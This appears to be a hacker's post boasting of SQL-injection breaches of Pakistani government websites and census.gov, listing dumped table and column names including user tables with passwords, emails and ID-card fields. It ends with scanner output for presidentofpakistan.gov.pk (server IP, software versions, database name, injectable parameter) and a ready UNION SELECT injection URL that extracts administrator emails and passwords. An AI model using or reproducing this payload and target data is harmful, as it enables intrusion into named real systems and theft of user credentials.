A pakistani websites hacked database. //www.psf.gov.pk// Table Name Columns count descipline feedback jobs mantis_bug_file_table mantis_bug_history_table mantis_bug_monitor_table mantis_bug_relationship_table mantis_bug_revision_table mantis_bug_table id project_id reporter_id handler_id duplicate_id priority severity reproducibility status resolution projection eta bug_text_id os os_build platform version fixed_in_version build profile_id view_state summary sponsorship_total sticky target_version category_id date_submitted due_date last_updated mantis_bug_tag_table mantis_bug_text_table mantis_bugnote_table mantis_bugnote_text_table mantis_category_table mantis_config_table config_id project_id user_id access_reqd type value mantis_custom_field_project_table mantis_custom_field_string_table mantis_custom_field_table mantis_email_table mantis_filters_table mantis_news_table mantis_plugin_table mantis_project_file_table mantis_project_hierarchy_table mantis_project_table mantis_project_user_list_table mantis_project_version_table mantis_sponsorship_table mantis_tag_table mantis_tokens_table mantis_user_pref_table mantis_user_print_pref_table mantis_user_profile_table mantis_user_table id username realname email password enabled protected access_level lost_password_request_count failed_login_count cookie_string last_visit date_created newsletter organization oid name type city province address web contact abbrevation pc1 pi project staff staffarea staffawards staffpublication stafftraining state tblNews tenders test id title doctype meta data path testpage travelgrant travelgrant_user id fname lname department designation organization phone cell fax state cnic user id first_name last_name username password email status access //www.census.gov// CHARACTER_SETS, COLLATIONS, COLLATION_CHARACTER_SET_APPLICABILITY, COLUMNS, COLUMN_PRIVILEGES, KEY_COLUMN_USAGE, PROFILING, ROUTINES, SCHEMATA, SCHEMA_PRIVILEGES, STATISTICS, TABLES, TABLE_CONSTRAINTS, TABLE_PRIVILEGES, TRIGGERS, USER_PRIVILEGES, VIEWS, account, area_interest, benefits, country, cv, cv_comment, cv_edu, cv_field, cv_job, cv_link, cv_photo, cv_pick_approval, cv_pick_div, cv_pick_edu_type, cv_pick_empl, cv_pick_flag, cv_pick_pub_type, cv_pick_topic, cv_pub, cv_pub_topic, cv_reviewer, cv_topic, dataset, dataset_coverage, dataset_field, dataset_fti, dataset_path, dataset_permission, disclosure_files, disclosure_request, disclosure_request_files, division, download, event, extra_field, foreign_keys, foreign_xr_keys, form, form_quality, form_year, funding, grp, industry, jel_codes, news, org_type, organization, origin, paper, paper_author, paper_dataset, paper_dataset_other, paper_notes, paper_status, period, person, person_roles, profession, proposal, proposal_approval_request, proposal_benefits, proposal_dataset, proposal_dataset_coverage, proposal_dataset_other, proposal_exte [+] table_name = columns proposal_dataset_other = id,proposal,dataset,unit_obs,size_obs,size_bytes,description CHARACTER_SETS = CHARACTER_SET_NAME,DEFAULT_COLLATE_NAME,DESCRIPTION,MAXLEN COLLATIONS = COLLATION_NAME,CHARACTER_SET_NAME,ID,IS_DEFAULT,IS_COMPILED,SORTLEN COLLATION_CHARACTER_SET_APPLICABILITY = COLLATION_NAME,CHARACTER_SET_NAME COLUMNS = TABLE_CATALOG,TABLE_SCHEMA,TABLE_NAME,COLUMN_NAME,ORDINAL_POSITION,COLUMN_DEFAULT,IS_NULLABLE,DATA_TYPE,CHARACTER_MAXIMUM_LENGTH,CHARACTER_OCTET_LENGTH,NUMERIC_PRECISION,NUMERIC_SCALE,CHARACTER_SET_NAME,COLLATION_NAME,COLUMN_TYPE,COLUMN_KEY,EXTRA,PRIVILEGES,COLUMN_COMMENT COLUMN_PRIVILEGES = GRANTEE,TABLE_CATALOG,TABLE_SCHEMA,TABLE_NAME,COLUMN_NAME,PRIVILEGE_TYPE,IS_GRANTABLE KEY_COLUMN_USAGE = CONSTRAINT_CATALOG,CONSTRAINT_SCHEMA,CONSTRAINT_NAME,TABLE_CATALOG,TABLE_SCHEMA,TABLE_NAME,COLUMN_NAME,ORDINAL_POSITION,POSITION_IN_UNIQUE_CONSTRAINT,REFERENCED_TABLE_SCHEMA,REFERENCED_TABLE_NAME,REFERENCED_COLUMN_NAME cv = cv_id,usr_id,empl_id,name_last,name_first,name_middle,name_suffix,name_display,division_id,phone,phone_flag,email,bio,approval_date,approval_id,approval_usr_id,edited PROFILING = QUERY_ID,SEQ,STATE,DURATION,CPU_USER,CPU_SYSTEM,CONTEXT_VOLUNTARY,CONTEXT_INVOLUNTARY,BLOCK_OPS_IN,BLOCK_OPS_OUT,MESSAGES_SENT,MESSAGES_RECEIVED,PAGE_FAULTS_MAJOR,PAGE_FAULTS_MINOR,SWAPS,SOURCE_FUNCTION,SOURCE_FILE,SOURCE_LINE SCHEMA_PRIVILEGES = GRANTEE,TABLE_CATALOG,TABLE_SCHEMA,PRIVILEGE_TYPE,IS_GRANTABLE proposal_dataset_coverage = proposal,coverage foreign_xr_keys = id,parent_table,parent_key,xr_table,xr_parent_key,xr_child_key,child_table,child_key STATISTICS = TABLE_CATALOG,TABLE_SCHEMA,TABLE_NAME,NON_UNIQUE,INDEX_SCHEMA,INDEX_NAME,SEQ_IN_INDEX,COLUMN_NAME,COLLATION,CARDINALITY,SUB_PART,PACKED,NULLABLE,INDEX_TYPE,COMMENT TABLES = TABLE_CATALOG,TABLE_SCHEMA,TABLE_NAME,TABLE_TYPE,ENGINE,VERSION,ROW_FORMAT,TABLE_ROWS,AVG_ROW_LENGTH,DATA_LENGTH,MAX_DATA_LENGTH,INDEX_LENGTH,DATA_FREE,AUTO_INCREMENT,CREATE_TIME,UPDATE_TIME,CHECK_TIME,TABLE_COLLATION,CHECKSUM,CREATE_OPTIONS,TABLE_COMMENT disclosure_files = id,parent,project,server,root,path,type,updated cv_pub = pub_id,cv_id,pub_type_id,pub,pub_flag_id,order //presidentofpakistan.gov.pk// http://www.presidentofpakistan.gov.pk/index.php?lang=en&opc=3&sel=2&pId=477 Host IP: 72.32.250.192 Web Server: Apache/2.2.3 (Red Hat) Powered-by: PHP/5.1.6 Keyword Found: Paindabad. Injection type is Integer DB Server: MySQL >=5 Selected Column Count is 10 Valid String Column is 2 Current DB: P0FPAKISTAN {EF2524FD2ECD57FBA015C3D97FAC1A207AF5FFCE} ### http://president.gov.pk/index.php?lang=en&opc=3&sel=2&pId=NULL%20union%20select%201,group_concat(emailUser,0x3a,password),3,4,5,6,7,8,9,10%20from%20cms_user-- ###